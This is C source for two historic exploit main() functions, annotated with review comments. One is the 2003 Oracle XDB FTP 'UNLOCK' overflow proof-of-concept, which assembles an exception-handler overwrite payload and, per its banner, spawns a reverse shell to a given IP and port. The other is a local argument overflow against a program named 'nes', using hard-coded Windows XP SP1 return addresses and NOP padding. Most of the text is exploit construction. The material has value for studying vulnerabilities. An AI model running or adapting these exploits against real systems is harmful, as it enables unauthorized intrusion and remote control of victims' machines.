/*
 * Entry point of the Oracle XDB FTP "UNLOCK" overflow proof-of-concept
 * (historic, dated 6th July 2003 in the banner below).
 *
 * Expected argv: host userid password ipaddress port (argc == 6).
 * Anything else prints the usage banner and exits 0.
 *
 * Everything this function touches besides argv is file-scope state
 * declared outside this block and not visible here: host, exploit_code,
 * short_jump, exception_handler, exploit, and the helpers StartWinsock(),
 * SetUpExploit() and GainControlOfOracle(). Their sizes and contracts
 * cannot be checked from this function alone.
 *
 * Returns 0 on the usage and normal paths; on a Winsock start failure it
 * returns whatever printf() returned (the byte count of the message), so
 * the process exit status is non-zero only by accident of message length.
 */
int main(int argc, char *argv[]) {
    if(argc != 6) {
        printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
        printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
        printf("\n\n\tSpawns a reverse shell to specified port");
        printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
        printf("\n\n\tDavid Litchfield\n\t([email protected])");
        printf("\n\t6th July 2003\n\n\n");
        return 0;
    }
    /* NOTE(review): strncpy() does not NUL-terminate when argv[1] is 250
     * bytes or longer; whether `host` is sized and pre-zeroed to cover
     * that is decided by its file-scope declaration, not visible here. */
    strncpy(host,argv[1],250);
    /* printf()'s return value (characters written) becomes the exit code. */
    if(StartWinsock()==0)
        return printf("Error starting Winsock.\n");
    /* Listener address/port for the reverse connection described in the
     * banner are folded into the payload by SetUpExploit(); argv[5] is
     * parsed with atoi(), so a non-numeric port silently becomes 0. */
    SetUpExploit(argv[4],atoi(argv[5]));
    /* The payload is assembled by unbounded strcat() into the file-scope
     * exploit_code buffer. The component names (short_jump,
     * exception_handler) suggest an exception-handler overwrite layout,
     * but the bytes themselves are defined outside this block. Statement
     * order here fixes the byte order of the final buffer. */
    strcat(exploit_code,short_jump);
    strcat(exploit_code,exception_handler);
    strcat(exploit_code,exploit);
    strcat(exploit_code,"\r\n");   /* FTP command terminator */
    /* Credentials are passed straight through; the network exchange with
     * the FTP service happens inside GainControlOfOracle(). */
    GainControlOfOracle(argv[2],argv[3]);
    return 0;
}
/*
 * Entry point of a second, separate proof-of-concept on this page: a
 * command-line argument overflow in a local program the original author
 * calls "nes", launched via WinExec().
 *
 * Expected argv: ipaddress port (argc == 3); otherwise exits 0 silently.
 *
 * Uses file-scope state and helpers declared outside this block:
 * StartWinsock(), SetUpExploit() and the `exploit` byte string. The
 * hard-coded addresses below are, per the author's comments, specific
 * to Windows XP SP1 and will not be meaningful on any other build.
 *
 * Returns 0 unconditionally; the return value of StartWinsock() is not
 * checked here (the other main() on this page does check it).
 */
int main(int argc, char *argv[]) {
    int cnt = 0;
    /* NOTE(review): `unsigned char` buffer passed to strcpy/strcat/WinExec,
     * which take `char *`; compilers warn about the pointer mismatch.
     * No length check precedes any of the strcat() calls below, so the
     * 1000-byte bound relies on `exploit` being short enough. */
    unsigned char buffer[1000]="";
    if(argc !=3)
        return 0;
    StartWinsock();
    /* Set the IP address and port in the exploit code.
     * Author's note: if the IP address encodes to a NULL byte the string
     * is truncated (C strings end at the first 0x00). */
    SetUpExploit(argv[1],atoi(argv[2]));
    /* Name of the vulnerable program, followed by a space, then the
     * overlong argument. */
    strcpy(buffer,"nes ");
    /* Copy the exploit code to the buffer. */
    strcat(buffer,exploit);
    /* Pad out the buffer: 25 x 4 = 100 bytes of 0x90, then 4 more. */
    while(cnt < 25) {
        strcat(buffer,"\x90\x90\x90\x90");
        cnt ++;
    }
    strcat(buffer,"\x90\x90\x90\x90");
    /* Here the saved return address is overwritten.
     * Author's comment: this is the address of lstrcatA on Windows XP SP1
     * (0x77E74B66), written little-endian. */
    strcat(buffer,"\x66\x4B\xE7\x77");
    /* Return address for lstrcatA: where the code will be copied to,
     * in the TEB (author's comment). */
    strcat(buffer,"\xBC\xE1\xFD\x7F");
    /* Destination buffer argument for lstrcatA; same TEB address. */
    strcat(buffer,"\xBC\xE1\xFD\x7F");
    /* Source buffer argument: the address of the original buffer on the
     * stack (author's comment). Only three bytes are written here;
     * presumably the fourth (0x00) is supplied by the string's own
     * terminator, since strcat() cannot place a NUL -- confirm. */
    strcat(buffer,"\x10\xFB\x12");
    /* Launch the vulnerable program with the crafted command line. */
    WinExec(buffer,SW_MAXIMIZE);
    return 0;
}